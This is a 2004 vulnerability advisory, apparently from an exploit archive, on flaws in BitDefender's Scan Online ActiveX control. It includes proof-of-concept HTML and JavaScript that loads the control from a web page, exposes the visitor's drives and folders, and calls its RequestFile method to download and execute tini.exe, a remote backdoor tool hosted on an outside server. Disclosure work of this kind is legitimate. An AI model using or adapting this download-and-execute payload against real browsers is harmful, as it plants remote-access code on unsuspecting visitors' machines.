bitdefender.txt

bitdefender.txt: Posted Apr 19, 2004; Authored by Rafel Ivgi | Site theinsider.deep-ice.com; BitDefender's online scanning service has Active-X related flaws that allow an attacker to run arbitrary code server side.; tags | advisory, arbitrary, activex; SHA-256 | b99278bb29477cd2c8b3b823340d554551425884717cdd650dc007d6d6ad6370; Download | Favorite | View

bitdefender.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:  BitDefender Scan Online(ActiveX)
Vendors:        http://www.bitdefender.com/scan/Msie/index.php
Platforms:      Windows
Bug:                Remote File Download & Execute & Private Information
Disclosure
Risk:                High - Running Arbitary Code
Exploitation:   Remote with browser
Date:               19 Apr 2004
Author:           Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of BitDefender Scan Online Description:
"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files.

This is a quote of the page title:
"BitDefender AntiVirus - Data Security, AntiVirus Software, Free
Protection".
The meaning of this sentence is very far from reality.
I believe this to be a ridiculous that an AntiVirus will deliver and execute
a virus on my system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

"BitDefender Scan Online" downloads its components and registered
the following COM/ActiveX Object:

"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID:
80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection, all properties and
functions cannot be set/accessed by the :

object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

It can only be set/accessed using(html object tag created object):

"<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>"
----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" Disclosures the users information, allowing a
remote user to see
all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
------------------- CUT HERE -------------------

----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" contains a function that will

***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***

For Example:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;

function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}

 setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

bitdefender.txt

bitdefender.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

bitdefender.txt

Share This

bitdefender.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems